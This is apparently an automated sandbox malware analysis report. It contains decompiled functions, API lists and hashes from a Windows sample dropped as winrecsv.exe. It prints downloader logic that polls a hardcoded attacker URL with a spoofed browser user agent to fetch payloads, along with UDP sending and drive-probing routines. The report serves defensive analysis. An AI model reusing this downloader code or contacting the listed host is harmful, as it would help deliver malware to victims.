                                                                                  • Associated: 00000005.00000002.606945122.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000005.00000002.606960359.0000000000413000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_400000_winrecsv.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CloseDrivesLogicalOpenQueryValue
                                                                                  • String ID: NoDrives$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
                                                                                  • API String ID: 2666887985-3471754645
                                                                                  • Opcode ID: ff4268d8e916e307594962af17df6f2c266081f4fa44dda94cb6f84f4e563840
                                                                                  • Instruction ID: 2b22d0c5c2d49d9c8cdb046828b539e9dc82b3d10e46f6989da5e31515f8ca9d
                                                                                  • Opcode Fuzzy Hash: ff4268d8e916e307594962af17df6f2c266081f4fa44dda94cb6f84f4e563840
                                                                                  • Instruction Fuzzy Hash: 8411FCB5E4020A9BDF10DFD0D945BEFBBB4BB48704F108129E611B7280D7B85A45CB99
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 100%
                                                                                  			E0040D7F0(char* _a4, intOrPtr* _a8) {
                                                                                  				void* _v8;
                                                                                  				char _v9;
                                                                                  				void* _v16;
                                                                                  				void _v20;
                                                                                  				long _v24;
                                                                                  				void* _t21;
                                                                                  				void* _t24;
                                                                                  
                                                                                  				_v9 = 0;
                                                                                  				_t21 = InternetOpenA("Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36", 1, 0, 0, 0); // executed
                                                                                  				_v16 = _t21;
                                                                                  				if(_v16 != 0) {
                                                                                  					_t24 = InternetOpenUrlA(_v16, _a4, 0, 0, 0, 0); // executed
                                                                                  					_v8 = _t24;
                                                                                  					if(_v8 != 0) {
                                                                                  						_v24 = 4;
                                                                                  						HttpQueryInfoA(_v8, 0x20000005,  &_v20,  &_v24, 0);
                                                                                  						if(_v20 > 0x1388 && _v20 !=  *_a8) {
                                                                                  							 *_a8 = _v20;
                                                                                  							_v9 = 1;
                                                                                  						}
                                                                                  						InternetCloseHandle(_v8); // executed
                                                                                  					}
                                                                                  					InternetCloseHandle(_v16);
                                                                                  				}
                                                                                  				return _v9;
                                                                                  			}










                                                                                  0x0040d7f6
                                                                                  0x0040d807
                                                                                  0x0040d80d
                                                                                  0x0040d814
                                                                                  0x0040d826
                                                                                  0x0040d82c
                                                                                  0x0040d833
                                                                                  0x0040d835
                                                                                  0x0040d84f
                                                                                  0x0040d85c
                                                                                  0x0040d86e
                                                                                  0x0040d870
                                                                                  0x0040d870
                                                                                  0x0040d878
                                                                                  0x0040d878
                                                                                  0x0040d882
                                                                                  0x0040d882
                                                                                  0x0040d88e

                                                                                  APIs
                                                                                  • InternetOpenA.WININET(Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36,00000001,00000000,00000000,00000000), ref: 0040D807
                                                                                  • InternetOpenUrlA.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 0040D826
                                                                                  • HttpQueryInfoA.WININET(00000000,20000005,?,00000004,00000000), ref: 0040D84F
                                                                                  • InternetCloseHandle.WININET(00000000), ref: 0040D878
                                                                                  • InternetCloseHandle.WININET(00000000), ref: 0040D882
                                                                                  Strings
                                                                                  • Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36, xrefs: 0040D802
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.606907194.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000005.00000002.606897136.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000005.00000002.606945122.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000005.00000002.606960359.0000000000413000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_400000_winrecsv.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Internet$CloseHandleOpen$HttpInfoQuery
                                                                                  • String ID: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36
                                                                                  • API String ID: 3871184103-2352012373
                                                                                  • Opcode ID: 6a61b89792010d5137e947f11a542a7cbeedc3085e70793a22fad245e61e0421
                                                                                  • Instruction ID: 266a7dd59df556f887e0a4dfc4e5eaf5996777bbeb911e957400ba413950654c
                                                                                  • Opcode Fuzzy Hash: 6a61b89792010d5137e947f11a542a7cbeedc3085e70793a22fad245e61e0421
                                                                                  • Instruction Fuzzy Hash: 1A110A75E40208ABDB10DFD4CC49FDEB7B5AB08700F1085A5F9116B2D0C7B5AA44CB55
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 100%
                                                                                  			E0040BF50(signed int* _a4, long _a8, _Unknown_base(*)()* _a12, void* _a16, DWORD* _a20, HANDLE* _a24) {
                                                                                  				long _v8;
                                                                                  				signed int* _v12;
                                                                                  				void* _v16;
                                                                                  				void* _t45;
                                                                                  				void* _t49;
                                                                                  
                                                                                  				_v8 = 0;
                                                                                  				if(_a4 == 0) {
                                                                                  					L8:
                                                                                  					return _v8;
                                                                                  				}
                                                                                  				_v12 = _a4;
                                                                                  				EnterCriticalSection( &(_v12[1]));
                                                                                  				E0040BED0( &(_v12[1]), _v12);
                                                                                  				if(_a12 != 0) {
                                                                                  					_v12[7] = E00408EA0(_v12[7], 4 +  *_v12 * 4, _v12[7], 4 +  *_v12 * 4);
                                                                                  					if(_v12[7] != 0) {
                                                                                  						_t45 = CreateThread(0, _a8, _a12, _a16, 0, _a20); // executed
                                                                                  						_v16 = _t45;
                                                                                  						if(_v16 != 0) {
                                                                                  							 *((intOrPtr*)(_v12[7] +  *_v12 * 4)) = _v16;
                                                                                  							 *_v12 =  *_v12 + 1;
                                                                                  							if(_a24 != 0) {
                                                                                  								_t49 = GetCurrentProcess();
                                                                                  								DuplicateHandle(GetCurrentProcess(), _v16, _t49, _a24, 0, 0, 2);
                                                                                  							}
                                                                                  							_v8 = 1;
                                                                                  						}
                                                                                  					}
                                                                                  				}
                                                                                  				LeaveCriticalSection( &(_v12[1]));
                                                                                  				goto L8;
                                                                                  			}








                                                                                  0x0040bf56
                                                                                  0x0040bf61
                                                                                  0x0040c038
                                                                                  0x0040c03e
                                                                                  0x0040c03e
                                                                                  0x0040bf6a
                                                                                  0x0040bf74
                                                                                  0x0040bf7e
                                                                                  0x0040bf8a
                                                                                  0x0040bfaf
                                                                                  0x0040bfb9
                                                                                  0x0040bfcf
                                                                                  0x0040bfd5
                                                                                  0x0040bfdc
                                                                                  0x0040bfec
                                                                                  0x0040bffa
                                                                                  0x0040c000
                                                                                  0x0040c00c
                                                                                  0x0040c01e
                                                                                  0x0040c01e
                                                                                  0x0040c024
                                                                                  0x0040c024
                                                                                  0x0040bfdc
                                                                                  0x0040bfb9
                                                                                  0x0040c032
                                                                                  0x00000000

                                                                                  APIs
                                                                                  • EnterCriticalSection.KERNEL32(-00000004,00000000), ref: 0040BF74
                                                                                    • Part of subcall function 0040BED0: WaitForSingleObject.KERNEL32(?,00000000), ref: 0040BF10
                                                                                    • Part of subcall function 0040BED0: CloseHandle.KERNEL32(?), ref: 0040BF29
                                                                                  • CreateThread.KERNELBASE ref: 0040BFCF
                                                                                  • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002), ref: 0040C00C
                                                                                  • GetCurrentProcess.KERNEL32(00000000,00000000), ref: 0040C017
                                                                                  • DuplicateHandle.KERNEL32(00000000), ref: 0040C01E
                                                                                  • LeaveCriticalSection.KERNEL32(-00000004), ref: 0040C032
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.606907194.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000005.00000002.606897136.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000005.00000002.606945122.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000005.00000002.606960359.0000000000413000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_400000_winrecsv.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CriticalCurrentHandleProcessSection$CloseCreateDuplicateEnterLeaveObjectSingleThreadWait
                                                                                  • String ID:
                                                                                  • API String ID: 2251373460-0
                                                                                  • Opcode ID: d9072ebd16b6812de4560c3d06914d0ae5d8c789f3c20ec82b6015f19e15eb00
                                                                                  • Instruction ID: 5aaab35954c252b20d942d79868cba7d8a41f7cfd36b01251640d95963f0b6d7
                                                                                  • Opcode Fuzzy Hash: d9072ebd16b6812de4560c3d06914d0ae5d8c789f3c20ec82b6015f19e15eb00
                                                                                  • Instruction Fuzzy Hash: 23311E74A00208EFDB04DF94D889F9EBBB5FF48314F1081A9E905A7391D779AA81CF94
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 91%
                                                                                  			E00405900() {
                                                                                  				intOrPtr _v8;
                                                                                  				intOrPtr _v12;
                                                                                  				intOrPtr _v16;
                                                                                  				intOrPtr _v20;
                                                                                  				intOrPtr _v24;
                                                                                  				intOrPtr _v28;
                                                                                  				intOrPtr _v32;
                                                                                  				intOrPtr _v36;
                                                                                  				intOrPtr _v40;
                                                                                  				signed int _v44;
                                                                                  				char _v148;
                                                                                  				intOrPtr _v152;
                                                                                  				intOrPtr _v156;
                                                                                  				intOrPtr _v160;
                                                                                  				intOrPtr _v164;
                                                                                  				intOrPtr _v168;
                                                                                  				intOrPtr _v172;
                                                                                  				signed int _v176;
                                                                                  				signed char _t36;
                                                                                  				void* _t46;
                                                                                  				void* _t47;
                                                                                  
                                                                                  				_v44 = 0;
                                                                                  				_v40 = 0;
                                                                                  				_v36 = 0;
                                                                                  				_v32 = 0;
                                                                                  				_v28 = 0;
                                                                                  				_v24 = 0;
                                                                                  				_v20 = 0;
                                                                                  				_v16 = 0;
                                                                                  				_v12 = 0;
                                                                                  				_v8 = 0;
                                                                                  				_v172 = 0x411138;
                                                                                  				_v168 = 0x41113c;
                                                                                  				_v164 = 0x411140;
                                                                                  				_v160 = 0x411144;
                                                                                  				_v156 = 0x411148;
                                                                                  				_v152 = 0x41114c;
                                                                                  				while(1) {
                                                                                  					Sleep(0x3e8); // executed
                                                                                  					_v176 = 0;
                                                                                  					while(_v176 < 6) {
                                                                                  						Sleep(0x3e8); // executed
                                                                                  						_push( *((intOrPtr*)(_t46 + _v176 * 4 - 0xa8)));
                                                                                  						_push("http://185.215.113.66/twizt/");
                                                                                  						wsprintfA( &_v148, "%s%s");
                                                                                  						_t36 = E0040D7F0( &_v148, _t46 + _v176 * 4 - 0x28); // executed
                                                                                  						_t47 = _t47 + 0x18;
                                                                                  						if((_t36 & 0x000000ff) == 1) {
                                                                                  							E0040D890( &_v148, 0); // executed
                                                                                  							_t47 = _t47 + 8;
                                                                                  						}
                                                                                  						_v176 = _v176 + 1;
                                                                                  					}
                                                                                  					Sleep(0xdbba0); // executed
                                                                                  				}
                                                                                  			}
























                                                                                  0x00405909
                                                                                  0x00405912
                                                                                  0x00405915
                                                                                  0x00405918
                                                                                  0x0040591b
                                                                                  0x0040591e
                                                                                  0x00405921
                                                                                  0x00405924
                                                                                  0x00405927
                                                                                  0x0040592a
                                                                                  0x0040592d
                                                                                  0x00405937
                                                                                  0x00405941
                                                                                  0x0040594b
                                                                                  0x00405955
                                                                                  0x0040595f
                                                                                  0x00405969
                                                                                  0x0040596e
                                                                                  0x00405974
                                                                                  0x0040598f
                                                                                  0x0040599d
                                                                                  0x004059b0
                                                                                  0x004059b1
                                                                                  0x004059c2
                                                                                  0x004059dd
                                                                                  0x004059e2
                                                                                  0x004059eb
                                                                                  0x004059f6
                                                                                  0x004059fb
                                                                                  0x004059fb
                                                                                  0x00405989
                                                                                  0x00405989
                                                                                  0x00405a05
                                                                                  0x00405a05

                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.606907194.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000005.00000002.606897136.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000005.00000002.606945122.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000005.00000002.606960359.0000000000413000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_400000_winrecsv.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Sleep$wsprintf
                                                                                  • String ID: %s%s$http://185.215.113.66/twizt/
                                                                                  • API String ID: 3195947292-3378761964
                                                                                  • Opcode ID: 073bb2fb0fef4dcd1ca273c0c354560f53e1d9e1eca1e683211fec216546dafb
                                                                                  • Instruction ID: 33ee1419d531fd34fd9c2865182aea181f8c03b5f59c5093f7aa5c1a3f23e5cd
                                                                                  • Opcode Fuzzy Hash: 073bb2fb0fef4dcd1ca273c0c354560f53e1d9e1eca1e683211fec216546dafb
                                                                                  • Instruction Fuzzy Hash: 7F2151B0D00318EFDB50DFA4CD45BDEBBB4BB09304F5081AAD64DB6281E7785A848F69
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 68%
                                                                                  			E0040DF70(int __eax, long _a4, void* _a8, intOrPtr _a12, short _a16) {
                                                                                  				short _v6;
                                                                                  				short _v10;
                                                                                  				short _v14;
                                                                                  				short _v18;
                                                                                  				short _v20;
                                                                                  				short _v22;
                                                                                  				int* _v24;
                                                                                  				char _v25;
                                                                                  				char _v29;
                                                                                  				int* _v52;
                                                                                  				char _v53;
                                                                                  				short _t30;
                                                                                  				short _t35;
                                                                                  				long _t38;
                                                                                  				int* _t45;
                                                                                  				intOrPtr* _t50;
                                                                                  				void* _t60;
                                                                                  				int _t64;
                                                                                  				long _t67;
                                                                                  
                                                                                  				_t50 = _a4;
                                                                                  				_t64 = __eax;
                                                                                  				_t30 = 0;
                                                                                  				_v25 = 0;
                                                                                  				if(_t50 == 0 ||  *_t50 != 0x756470 || _a8 == 0 || __eax == 0) {
                                                                                  					L12:
                                                                                  					return _t30;
                                                                                  				} else {
                                                                                  					_t60 = __eax + 4;
                                                                                  					_t45 = E00408E60(_t60);
                                                                                  					_t6 =  &(_t45[1]); // 0x4
                                                                                  					_v24 = _t45;
                                                                                  					 *_t45 = _t64;
                                                                                  					memcpy(_t6, _a8, _t64);
                                                                                  					_v18 = 0;
                                                                                  					_v14 = 0;
                                                                                  					_v10 = 0;
                                                                                  					_v6 = 0;
                                                                                  					_t35 = _a16;
                                                                                  					_v20 = 2;
                                                                                  					__imp__#9(_t35);
                                                                                  					_v22 = _t35;
                                                                                  					_v20 = _a12;
                                                                                  					if(_t60 == 0) {
                                                                                  						L10:
                                                                                  						_v29 = 1;
                                                                                  						E00408FB0(_t45);
                                                                                  						return _v29;
                                                                                  					} else {
                                                                                  						while(1) {
                                                                                  							_t38 = _a4;
                                                                                  							__imp__#20( *((intOrPtr*)(_t38 + 8)), _t45, _t60, 0,  &_v24, 0x10); // executed
                                                                                  							_t67 = _t38;
                                                                                  							if(_t67 == 0xffffffff) {
                                                                                  								break;
                                                                                  							}
                                                                                  							InterlockedExchangeAdd(_a4 + 0x1c, _t67);
                                                                                  							_t60 = _t60 - _t67;
                                                                                  							_t45 = _t45 + _t67;
                                                                                  							if(_t60 != 0) {
                                                                                  								continue;
                                                                                  							} else {
                                                                                  								_v53 = 1;
                                                                                  								E00408FB0(_v52);
                                                                                  								return _v53;
                                                                                  							}
                                                                                  							goto L13;
                                                                                  						}
                                                                                  						if(_t60 != 0) {
                                                                                  							E00408FB0(_v52);
                                                                                  							_t30 = _v53;
                                                                                  							goto L12;
                                                                                  						} else {
                                                                                  							_t45 = _v52;
                                                                                  							goto L10;
                                                                                  						}
                                                                                  					}
                                                                                  				}
                                                                                  				L13:
                                                                                  			}






















                                                                                  0x0040df79
                                                                                  0x0040df7e
                                                                                  0x0040df80
                                                                                  0x0040df83
                                                                                  0x0040df89
                                                                                  0x0040e08a
                                                                                  0x0040e090
                                                                                  0x0040dfad
                                                                                  0x0040dfad
                                                                                  0x0040dfb6
                                                                                  0x0040dfbd
                                                                                  0x0040dfc1
                                                                                  0x0040dfc5
                                                                                  0x0040dfc7
                                                                                  0x0040dfce
                                                                                  0x0040dfd2
                                                                                  0x0040dfd6
                                                                                  0x0040dfda
                                                                                  0x0040dfdf
                                                                                  0x0040dfeb
                                                                                  0x0040dff0
                                                                                  0x0040dff9
                                                                                  0x0040dffe
                                                                                  0x0040e004
                                                                                  0x0040e060
                                                                                  0x0040e061
                                                                                  0x0040e066
                                                                                  0x0040e078
                                                                                  0x0040e006
                                                                                  0x0040e006
                                                                                  0x0040e006
                                                                                  0x0040e018
                                                                                  0x0040e01e
                                                                                  0x0040e023
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0040e02d
                                                                                  0x0040e033
                                                                                  0x0040e035
                                                                                  0x0040e039
                                                                                  0x00000000
                                                                                  0x0040e03b
                                                                                  0x0040e040
                                                                                  0x0040e045
                                                                                  0x0040e057
                                                                                  0x0040e057
                                                                                  0x00000000
                                                                                  0x0040e039
                                                                                  0x0040e05a
                                                                                  0x0040e07e
                                                                                  0x0040e083
                                                                                  0x00000000
                                                                                  0x0040e05c
                                                                                  0x0040e05c
                                                                                  0x00000000
                                                                                  0x0040e05c
                                                                                  0x0040e05a
                                                                                  0x0040e004
                                                                                  0x00000000

                                                                                  APIs
                                                                                  • memcpy.NTDLL(00000004,00000000,?,?), ref: 0040DFC7
                                                                                  • htons.WS2_32(?), ref: 0040DFF0
                                                                                  • sendto.WS2_32(?,00000000,?,00000000,?,00000010), ref: 0040E018
                                                                                  • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 0040E02D
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.606907194.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000005.00000002.606897136.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000005.00000002.606945122.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000005.00000002.606960359.0000000000413000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_400000_winrecsv.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: ExchangeInterlockedhtonsmemcpysendto
                                                                                  • String ID: pdu
                                                                                  • API String ID: 2164660128-2320407122
                                                                                  • Opcode ID: ad203699c0f73e1d20fa981d9dd844b3e240f33b07fa194a24806bbeb4069567
                                                                                  • Instruction ID: d66807eb1e7b0d5154e21252e4693ec0aa38c6c5b5b9df1ad79a440d19662bd5
                                                                                  • Opcode Fuzzy Hash: ad203699c0f73e1d20fa981d9dd844b3e240f33b07fa194a24806bbeb4069567
                                                                                  • Instruction Fuzzy Hash: 8B31F2362043119FC710DF69D880A9BB7E4AFC9714F04497EF99897381DA7489198BEB
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • CoInitializeEx.OLE32(00000000,00000002,?,?,00406874), ref: 004057B8
                                                                                  • SysAllocString.OLEAUT32(C:\Windows\winrecsv.exe), ref: 004057C3
                                                                                  • CoUninitialize.OLE32 ref: 004057E8
                                                                                    • Part of subcall function 00405520: SysFreeString.OLEAUT32(00000000), ref: 00405738
                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 004057E2
                                                                                  Strings
                                                                                  • C:\Windows\winrecsv.exe, xrefs: 004057BE
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.606907194.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000005.00000002.606897136.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000005.00000002.606945122.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000005.00000002.606960359.0000000000413000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_400000_winrecsv.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: String$Free$AllocInitializeUninitialize
                                                                                  • String ID: C:\Windows\winrecsv.exe
                                                                                  • API String ID: 459949847-134380739
                                                                                  • Opcode ID: b8475d7346bb43be32fa0760030d30944301d8ab8fa8548105178a417464336f
                                                                                  • Instruction ID: ed05d97b5b317eb6b2af260c68b5e38350126176a91c2a59017ff1c3aafa5288
                                                                                  • Opcode Fuzzy Hash: b8475d7346bb43be32fa0760030d30944301d8ab8fa8548105178a417464336f
                                                                                  • Instruction Fuzzy Hash: A8E04875941308FBD700DBE0ED0EB9E7778DB05701F108175F90567291D6B55E80DB59
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 100%
                                                                                  			E0040E0A0(intOrPtr* __ebx, void* __edi) {
                                                                                  				void* _t8;
                                                                                  				intOrPtr* _t18;
                                                                                  				intOrPtr _t23;
                                                                                  				intOrPtr _t26;
                                                                                  				void* _t28;
                                                                                  
                                                                                  				_t18 = __ebx;
                                                                                  				if(__ebx != 0 &&  *__ebx == 0x756470) {
                                                                                  					SetEvent( *(__ebx + 0x10));
                                                                                  					WaitForSingleObject( *(__ebx + 0x14), 0xffffffff);
                                                                                  					CloseHandle( *(__ebx + 0x14));
                                                                                  					_t26 =  *((intOrPtr*)(__ebx + 0x20));
                                                                                  					if(_t26 == 0) {
                                                                                  						L6:
                                                                                  						E00409940( *((intOrPtr*)(_t18 + 8))); // executed
                                                                                  						return E00408FB0(_t18);
                                                                                  					}
                                                                                  					do {
                                                                                  						E00408FB0( *((intOrPtr*)(_t26 + 0x18)));
                                                                                  						_t23 =  *((intOrPtr*)(_t26 + 0x1c));
                                                                                  						E00408FB0(_t26);
                                                                                  						_t28 = _t28 + 8;
                                                                                  						_t26 = _t23;
                                                                                  					} while (_t23 != 0);
                                                                                  					goto L6;
                                                                                  				}
                                                                                  				return _t8;
                                                                                  			}








                                                                                  0x0040e0a0
                                                                                  0x0040e0a2
                                                                                  0x0040e0b1
                                                                                  0x0040e0bd
                                                                                  0x0040e0c7
                                                                                  0x0040e0cd
                                                                                  0x0040e0d2
                                                                                  0x0040e0f1
                                                                                  0x0040e0f5
                                                                                  0x00000000
                                                                                  0x0040e103
                                                                                  0x0040e0d5
                                                                                  0x0040e0d9
                                                                                  0x0040e0de
                                                                                  0x0040e0e2
                                                                                  0x0040e0e7
                                                                                  0x0040e0ea
                                                                                  0x0040e0ec
                                                                                  0x00000000
                                                                                  0x0040e0f0
                                                                                  0x0040e104

                                                                                  APIs
                                                                                  • SetEvent.KERNEL32(?,?,0040E195,?,?,0040C2CE,00000000), ref: 0040E0B1
                                                                                  • WaitForSingleObject.KERNEL32(?,000000FF,?,0040E195,?,?,0040C2CE,00000000), ref: 0040E0BD
                                                                                  • CloseHandle.KERNEL32(?,?,0040E195,?,?,0040C2CE,00000000), ref: 0040E0C7
                                                                                    • Part of subcall function 00408FB0: HeapFree.KERNEL32(00930000,00000000,00401192,?,00401192,?), ref: 0040900B
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.606907194.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000005.00000002.606897136.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000005.00000002.606945122.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000005.00000002.606960359.0000000000413000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_400000_winrecsv.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CloseEventFreeHandleHeapObjectSingleWait
                                                                                  • String ID: pdu
                                                                                  • API String ID: 309973729-2320407122
                                                                                  • Opcode ID: 8fe05da971c099299698b469a649331a8def73c54f65e43091863788282114f1
                                                                                  • Instruction ID: f8868823fc7079781ad89b5054c4351009e6be9a29e70cb83faf709a4bea03a0
                                                                                  • Opcode Fuzzy Hash: 8fe05da971c099299698b469a649331a8def73c54f65e43091863788282114f1
                                                                                  • Instruction Fuzzy Hash: 7FF0C2B64002209BCB209F66EC84D577779AE843203044A7EFD516B38ACE78EC51C7A9
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 100%
                                                                                  			E004047E0(WCHAR* _a4) {
                                                                                  				int _v8;
                                                                                  				short _v1052;
                                                                                  				int _v1056;
                                                                                  				int _t14;
                                                                                  				long _t17;
                                                                                  				int _t18;
                                                                                  
                                                                                  				_t14 = GetDriveTypeW(_a4); // executed
                                                                                  				_v8 = _t14;
                                                                                  				_v1056 = _v8;
                                                                                  				if(_v1056 >= 2 && (_v1056 <= 3 || _v1056 == 6)) {
                                                                                  					_t17 = QueryDosDeviceW(_a4,  &_v1052, 0x208); // executed
                                                                                  					if(_t17 != 0) {
                                                                                  						_t18 = StrCmpNW( &_v1052, L"\\??\\", 4); // executed
                                                                                  						if(_t18 == 0) {
                                                                                  							_v8 = 1;
                                                                                  						}
                                                                                  					}
                                                                                  				}
                                                                                  				return _v8;
                                                                                  			}









                                                                                  0x004047ed
                                                                                  0x004047f3
                                                                                  0x004047f9
                                                                                  0x00404806
                                                                                  0x0040482c
                                                                                  0x00404834
                                                                                  0x00404844
                                                                                  0x0040484c
                                                                                  0x0040484e
                                                                                  0x0040484e
                                                                                  0x0040484c
                                                                                  0x00404834
                                                                                  0x0040485b

                                                                                  APIs
                                                                                  • GetDriveTypeW.KERNELBASE(0040489F), ref: 004047ED
                                                                                  • QueryDosDeviceW.KERNELBASE(0040489F,?,00000208), ref: 0040482C
                                                                                  • StrCmpNW.KERNELBASE(?,\??\,00000004), ref: 00404844
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.606907194.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000005.00000002.606897136.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000005.00000002.606945122.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000005.00000002.606960359.0000000000413000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_400000_winrecsv.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: DeviceDriveQueryType
                                                                                  • String ID: \??\
                                                                                  • API String ID: 1681518211-3047946824
                                                                                  • Opcode ID: 2b4ad6813e30ca617d8286429adeb6bd2046491341813551861da181f93699b6
                                                                                  • Instruction ID: 5abcc523fc43e3b538995df9ae9ab9c5832e94dc02c2deabd9e765cd8bb00b71
                                                                                  • Opcode Fuzzy Hash: 2b4ad6813e30ca617d8286429adeb6bd2046491341813551861da181f93699b6
                                                                                  • Instruction Fuzzy Hash: 2D01FFB594020CEBCF20EF95CD497D977B8AB44704F00C4BAAB18A7290D6799AC5CF98
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 100%
                                                                                  			E0040D530(char _a4) {
                                                                                  				long _v8;
                                                                                  				void* _v12;
                                                                                  				void* _t10;
                                                                                  
                                                                                  				_v8 = 0;
                                                                                  				_t2 =  &_a4; // 0x4050e0
                                                                                  				_t10 = CreateFileW( *_t2, 0x80000000, 1, 0, 3, 0, 0); // executed
                                                                                  				_v12 = _t10;
                                                                                  				if(_v12 != 0xffffffff) {
                                                                                  					_v8 = GetFileSize(_v12, 0);
                                                                                  					FindCloseChangeNotification(_v12); // executed
                                                                                  				}
                                                                                  				return _v8;
                                                                                  			}






                                                                                  0x0040d536
                                                                                  0x0040d54c
                                                                                  0x0040d550
                                                                                  0x0040d556
                                                                                  0x0040d55d
                                                                                  0x0040d56b
                                                                                  0x0040d572
                                                                                  0x0040d572
                                                                                  0x0040d57e

                                                                                  APIs
                                                                                  • CreateFileW.KERNELBASE(P@,80000000,00000001,00000000,00000003,00000000,00000000,004050E0), ref: 0040D550
                                                                                  • GetFileSize.KERNEL32(000000FF,00000000), ref: 0040D565
                                                                                  • FindCloseChangeNotification.KERNELBASE(000000FF), ref: 0040D572
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.606907194.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000005.00000002.606897136.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
